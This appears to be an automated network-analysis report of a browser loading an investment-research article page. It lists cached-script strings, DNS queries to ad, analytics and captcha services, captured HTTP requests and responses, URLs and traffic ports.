(Facebook)
Source: chromecache_163.2.drString found in binary or memory: var fusionLightboxVars = {"status_lightbox":"1","lightbox_gallery":"1","lightbox_skin":"metro-white","lightbox_title":"1","lightbox_arrows":"1","lightbox_slideshow_speed":"5000","lightbox_autoplay":"","lightbox_opacity":"0.90","lightbox_desc":"","lightbox_social":"1","lightbox_social_links":{"facebook":{"source":"https:\/\/www.facebook.com\/sharer.php?u={URL}","text":"Share on Facebook"},"twitter":{"source":"https:\/\/x.com\/intent\/post?turl={URL}","text":"Share on X"},"linkedin":{"source":"https:\/\/www.linkedin.com\/shareArticle?mini=true&url={URL}","text":"Share on LinkedIn"},"mail":{"source":"mailto:?body={URL}","text":"Share by Email"}},"lightbox_deeplinking":"1","lightbox_path":"vertical","lightbox_post_images":"1","lightbox_animation_speed":"normal","l10n":{"close":"Press Esc to close","enterFullscreen":"Enter Fullscreen (Shift+Enter)","exitFullscreen":"Exit Fullscreen (Shift+Enter)","slideShow":"Slideshow","next":"Next","previous":"Previous"}}; equals www.linkedin.com (Linkedin)
Source: chromecache_213.2.dr, chromecache_150.2.drString found in binary or memory: var prevCallback=window.onYouTubePlayerAPIReady,fusionTimeout=[];function registerYoutubePlayers(e){!0===window.yt_vid_exists&&(window.$youtube_players=[],jQuery(".tfs-slider").each(function(){var t=jQuery(this),a=t.find("[data-youtube-video-id]").find("iframe").length,i=!1;t.find("[data-youtube-video-id]").find("iframe").each(function(o){var u=jQuery(this);a===o+1&&void 0!==e&&(i=t.data("flexslider")),window.YTReady(function(){window.$youtube_players[u.attr("id")]=new YT.Player(u.attr("id"),{events:{onReady:onPlayerReady(u.parents("li"),i),onStateChange:onPlayerStateChange(u.attr("id"),t)}})})})}))}function onPlayerReady(e,t){return function(a){"yes"===jQuery(e).data("mute")&&a.target.mute(),t&&setTimeout(function(){playVideoAndPauseOthers(t)},300)}}function loadYoutubeIframeAPI(){var e,t;(!0===window.yt_vid_exists||jQuery("body").hasClass("fusion-builder-live"))&&((e=document.createElement("script")).src="https://www.youtube.com/iframe_api",(t=document.getElementsByTagName("script")[0]).parentNode.insertBefore(e,t))}function onYouTubePlayerAPIReadyCallback(){window.YTReady(!0)}function onPlayerStateChange(e,t){return function(e){e.data==YT.PlayerState.PLAYING&&jQuery(t).flexslider("pause"),e.data==YT.PlayerState.PAUSED&&jQuery(t).flexslider("play"),e.data==YT.PlayerState.BUFFERING&&jQuery(t).flexslider("pause"),e.data==YT.PlayerState.ENDED&&"1"==jQuery(t).data("autoplay")&&(void 0!==jQuery(t).find(".flex-active-slide").data("loop")&&"yes"!==jQuery(t).find(".flex-active-slide").data("loop")&&jQuery(t).flexslider("next"),jQuery(t).flexslider("play"))}}function ytVidId(e){return!!e.match(/^(?:https?:)?(\/\/)?(?:www\.)?(?:youtu\.be\/|youtube\.com\/(?:embed\/|v\/|watch\?v=|watch\?.+&v=))((\w|-){11})(?:\S+)?$/)&&RegExp.$1}function insertParam(e,t,a,i){var o,u,n,r,d,s,y;if(0<e.indexOf("#")?(o=e.indexOf("#"),u=e.substring(e.indexOf("#"),e.length)):(u="",o=e.length),r="",1<(n=e.substring(0,o).split("?")).length)for(d=n[1].split("&"),s=0;s<d.length;s++)(y=d[s].split("="))[0]!==t&&(""===r?r="?"+y[0]+"="+(y[1]?y[1]:""):(r+="&",r+=y[0]+"="+(y[1]?y[1]:"")));return""===r&&(r="?"),i?r="?"+t+"="+a+(1<r.length?"&"+r.substring(1):""):(""!==r&&"?"!==r&&(r+="&"),r+=t+"="+(a||"")),n[0]+r+u}function fusionYouTubeTimeout(e){void 0===fusionTimeout[e]&&(fusionTimeout[e]=0),setTimeout(function(){void 0!==window.$youtube_players&&void 0!==window.$youtube_players[e]&&void 0!==window.$youtube_players[e].playVideo?window.$youtube_players[e].playVideo():5>++fusionTimeout[e]&&fusionYouTubeTimeout(e)},325)}window.onYouTubePlayerAPIReady=prevCallback?function(){prevCallback(),onYouTubePlayerAPIReadyCallback()}:onYouTubePlayerAPIReadyCallback,window.YTReady=function(){var e=[],t=!1;return function(a,i){if(!0===a)for(t=!0;e.length;)e.shift()();else"function"==typeof a&&(t?a():e[i?"unshift":"push"](a))}}();var onYouTubeIframeAPIReady=function(){var e,t,a,i,o,u=_fbRowGetAllElementsWithAttribute("data-youtube-video-id");if("function"!=typeof fusionGetConsent||fusionGetConsent("youtub
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: alphaarchitect.com
Source: global trafficDNS traffic detected: DNS query: hcaptcha.com
Source: global trafficDNS traffic detected: DNS query: cdn.printfriendly.com
Source: global trafficDNS traffic detected: DNS query: a.remarketstats.com
Source: global trafficDNS traffic detected: DNS query: static.ads-twitter.com
Source: global trafficDNS traffic detected: DNS query: www.printfriendly.com
Source: global trafficDNS traffic detected: DNS query: a.clickcertain.com
Source: global trafficDNS traffic detected: DNS query: t.co
Source: global trafficDNS traffic detected: DNS query: analytics.twitter.com
Source: global trafficDNS traffic detected: DNS query: pluralism.themancav.com
Source: global trafficDNS traffic detected: DNS query: analytics.google.com
Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: js.hcaptcha.com
Source: global trafficDNS traffic detected: DNS query: a.usbrowserspeed.com
Source: global trafficDNS traffic detected: DNS query: tag.trovo-tag.com
Source: global trafficDNS traffic detected: DNS query: match.prod.bidr.io
Source: global trafficDNS traffic detected: DNS query: newassets.hcaptcha.com
Source: global trafficDNS traffic detected: DNS query: pixel.tapad.com
Source: global trafficDNS traffic detected: DNS query: i.liadm.com
Source: global trafficDNS traffic detected: DNS query: api2.hcaptcha.com
Source: global trafficDNS traffic detected: DNS query: api.hcaptcha.com
Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
Source: global trafficDNS traffic detected: DNS query: thrtle.com
Source: unknownHTTP traffic detected: POST /2024/12/long-term-expected-returns/ HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveContent-Length: 459sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNu5367pFmVzGKhtJX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://alphaarchitect.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg; _ga_DJ0HWC0D2K=GS1.1.1734698706.1.0.1734698706.60.0.0; _ga=GA1.1.1149377197.1734698707
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Dec 2024 12:45:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Dec 2024 12:45:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Dec 2024 12:45:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Dec 2024 12:45:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Dec 2024 12:45:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: chromecache_163.2.drString found in binary or memory: http://academicinsightsoninvesting.com
Source: chromecache_163.2.drString found in binary or memory: http://academicinsightsoninvesting.com/
Source: chromecache_163.2.drString found in binary or memory: http://alphaarchitect.com/alpha-architect-white-papers/
Source: chromecache_163.2.drString found in binary or memory: http://alphaarchitect.com/book
Source: chromecache_163.2.drString found in binary or memory: http://alphaarchitect.com/category/architect-academic-insights/academic-research-insight/
Source: chromecache_163.2.drString found in binary or memory: http://alphaarchitect.com/category/architect-academic-insights/momentum-investing/
Source: chromecache_163.2.drString found in binary or memory: http://alphaarchitect.com/category/architect-academic-insights/tactical-asset-allocation/
Source: chromecache_163.2.drString found in binary or memory: http://alphaarchitect.com/category/architect-academic-insights/value-investing/
Source: chromecache_163.2.drString found in binary or memory: http://alphaarchitect.com/category/turnkey-behavioral-finance/
Source: chromecache_163.2.drString found in binary or memory: http://alphaarchitect.com/contact
Source: chromecache_163.2.drString found in binary or memory: http://alphaarchitect.com/siteprivacy
Source: chromecache_163.2.drString found in binary or memory: http://alphaarchitect.com/terms
Source: chromecache_313.2.dr, chromecache_141.2.drString found in binary or memory: http://hayageek.com/
Source: chromecache_293.2.dr, chromecache_231.2.drString found in binary or memory: https://a.clickcertain.com/px/cont/?c=2645100a8c95db0&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&cn=U
Source: chromecache_235.2.drString found in binary or memory: https://a.clickcertain.com/px/r/?ccid=355cc50d-f67c-485f-9153-f0a0ddff6935
Source: chromecache_235.2.drString found in binary or memory: https://a.clickcertain.com/px/ta/?ccid=355cc50d-f67c-485f-9153-f0a0ddff6935
Source: chromecache_163.2.drString found in binary or memory: https://a.remarketstats.com/px/smart/?c=2645100a8c95db0
Source: chromecache_147.2.dr, chromecache_225.2.drString found in binary or memory: https://a.remarketstats.com/px/smart/?c=2645100a8c95db0&seg=
Source: chromecache_235.2.drString found in binary or memory: https://a.usbrowserspeed.com/cs?puid=4fb965c5-16ea-5d92-8eb3-ebb71d1ea0d9&pid=lc&r=https%3a%2f%2fa%2
Source: chromecache_324.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/#/schema/logo/image/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/#/schema/person/e8282a8635fe5e9327df61e89b0e36ad
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/#organization
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/#website
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/2020/09/can-we-use-the-shiller-cape-ratio-to-forecast-country-returns/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/2024/12/global-factor-performance-december-2024/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/2024/12/long-term-expected-returns/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/2024/12/long-term-expected-returns/#article
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/2024/12/momentum-determinants/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/2024/12/portfolio-efficiency/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/2024/12/private-equity-versus-public-equity-returns/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/?s=
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/author/elisabettabasilico/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/comments/feed/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/disclaimer/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/disclosures/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/feed/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/indexes/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/subscribe/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/terms/
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/enterprise/core.js?ver=1734350104
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/printfriendly.js?ver=1733842125
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/disable-gravity-forms-fields/di
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/ge
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/li
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/hcaptcha-for-forms-and-more/ass
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mailchimp-for-wp/assets/js/form
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mailchimp-top-bar/assets/script
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mc4wp-premium/ajax-forms/assets
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/fil
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/sel
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/wp-quicklatex/js/wp-quicklatex-
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avad
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/library/boot
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/hcaptcha-for-forms-and-more/assets/js/hcaptcha-gravity
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/common-frontend.min.js?ver=2
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/common.min.js?ver=2.9.1
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-account.min.js?ver=2.9.1
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-conditional.min.js?ver=2.
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-functions.min.js?ver=2.9.
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-gdpr.min.js?ver=2.9.1
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-modal.min.js?ver=2.9.1
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-profile.min.js?ver=2.9.1
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-responsive.min.js?ver=2.9
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-scripts.min.js?ver=2.9.1
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/cropper/cropper.min.js?ver
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/jquery-form/jquery-form.mi
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.date.min.
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.min.js?ve
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.time.min.
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/raty/um-raty.min.js?ver=2.
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/select2/select2.full.min.j
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/tipsy/tipsy.min.js?ver=1.0
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/um-confirm/um-confirm.min.
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/uploads/2017/08/favicon.png
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/uploads/2017/08/logo1-e1609510918466.png
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expec
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-content/uploads/compliance/indexes/Firm_Overview_vF.pdf
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-includes/js/underscore.min.js?ver=1.13.7
Source: chromecache_163.2.drString found in binary or memory: https://alphaarchitect.com/wp-includes/js/wp-util.min.js?ver=d4c9c51d21a0c26e910ec9a6a2b06883
Source: chromecache_162.2.dr, chromecache_324.2.drString found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_163.2.drString found in binary or memory: https://cdn.printfriendly.com/buttons/printfriendly-pdf-button-nobg-md.png
Source: chromecache_286.2.dr, chromecache_294.2.drString found in binary or memory: https://cdn.printfriendly.com/icons/globe.svg
Source: chromecache_245.2.dr, chromecache_263.2.drString found in binary or memory: https://fengyuanchen.github.io/cropperjs
Source: chromecache_303.2.dr, chromecache_279.2.dr, chromecache_143.2.dr, chromecache_241.2.drString found in binary or memory: https://github.com/select2/select2/blob/master/LICENSE.md
Source: chromecache_264.2.dr, chromecache_189.2.drString found in binary or memory: https://github.com/vimeo/player.js
Source: chromecache_324.2.drString found in binary or memory: https://google.com
Source: chromecache_324.2.drString found in binary or memory: https://googleads.g.doubleclick.net
Source: chromecache_146.2.dr, chromecache_291.2.dr, chromecache_169.2.drString found in binary or memory: https://hcaptcha.com/license
Source: chromecache_163.2.drString found in binary or memory: https://js.hcaptcha.com/1/api.js?onload=hCaptchaOnLoad&render=explicit&recaptchacompat=off
Source: chromecache_235.2.drString found in binary or memory: https://match.prod.bidr.io/cookie-sync/fivebyfive
Source: chromecache_324.2.drString found in binary or memory: https://pagead2.googlesyndication.com
Source: chromecache_162.2.dr, chromecache_324.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_286.2.dr, chromecache_294.2.drString found in binary or memory: https://pdf.printfriendly.com
Source: chromecache_244.2.dr, chromecache_204.2.drString found in binary or memory: https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I
Source: chromecache_163.2.drString found in binary or memory: https://schema.org
Source: chromecache_163.2.drString found in binary or memory: https://static.ads-twitter.com/uwt.js
Source: chromecache_162.2.dr, chromecache_324.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
Source: chromecache_135.2.dr, chromecache_233.2.drString found in binary or memory: https://tag.trovo-tag.com/
Source: chromecache_235.2.drString found in binary or memory: https://tag.trovo-tag.com/ldc.js?pid=193f0456&aid=193f0456
Source: chromecache_162.2.dr, chromecache_324.2.drString found in binary or memory: https://td.doubleclick.net
Source: chromecache_163.2.drString found in binary or memory: https://twitter.com/alphaarchitect
Source: chromecache_163.2.drString found in binary or memory: https://wordpress.org/plugins/mailchimp-for-wp/
Source: chromecache_163.2.drString found in binary or memory: https://wordpress.org/plugins/mailchimp-top-bar/
Source: chromecache_163.2.drString found in binary or memory: https://wp-rocket.me
Source: chromecache_324.2.drString found in binary or memory: https://www.google.com
Source: chromecache_324.2.drString found in binary or memory: https://www.googleadservices.com
Source: chromecache_324.2.drString found in binary or memory: https://www.googletagmanager.com
Source: chromecache_162.2.dr, chromecache_324.2.drString found in binary or memory: https://www.googletagmanager.com/a?
Source: chromecache_163.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-DJ0HWC0D2K
Source: chromecache_162.2.dr, chromecache_324.2.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
Source: chromecache_163.2.drString found in binary or memory: https://www.linkedin.com/company/alphaarchitectllc
Source: chromecache_163.2.drString found in binary or memory: https://www.linkedin.com/in/alphaarchitect/detail/recent-activity/
Source: chromecache_162.2.dr, chromecache_324.2.drString found in binary or memory: https://www.merchant-center-analytics.goog
Source: chromecache_294.2.drString found in binary or memory: https://www.printfriendly.com
Source: chromecache_163.2.drString found in binary or memory: https://www.tandfonline.com/doi/full/10.1080/0015198X.2024.2358737#abstract
Source: chromecache_163.2.drString found in binary or memory: https://www.youtube.com/alphaarchitect
Source: chromecache_162.2.dr, chromecache_213.2.dr, chromecache_150.2.dr, chromecache_324.2.drString found in binary or memory: https://www.youtube.com/iframe_api
Source: chromecache_163.2.drString found in binary or memory: https://x.com/
Source: chromecache_163.2.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
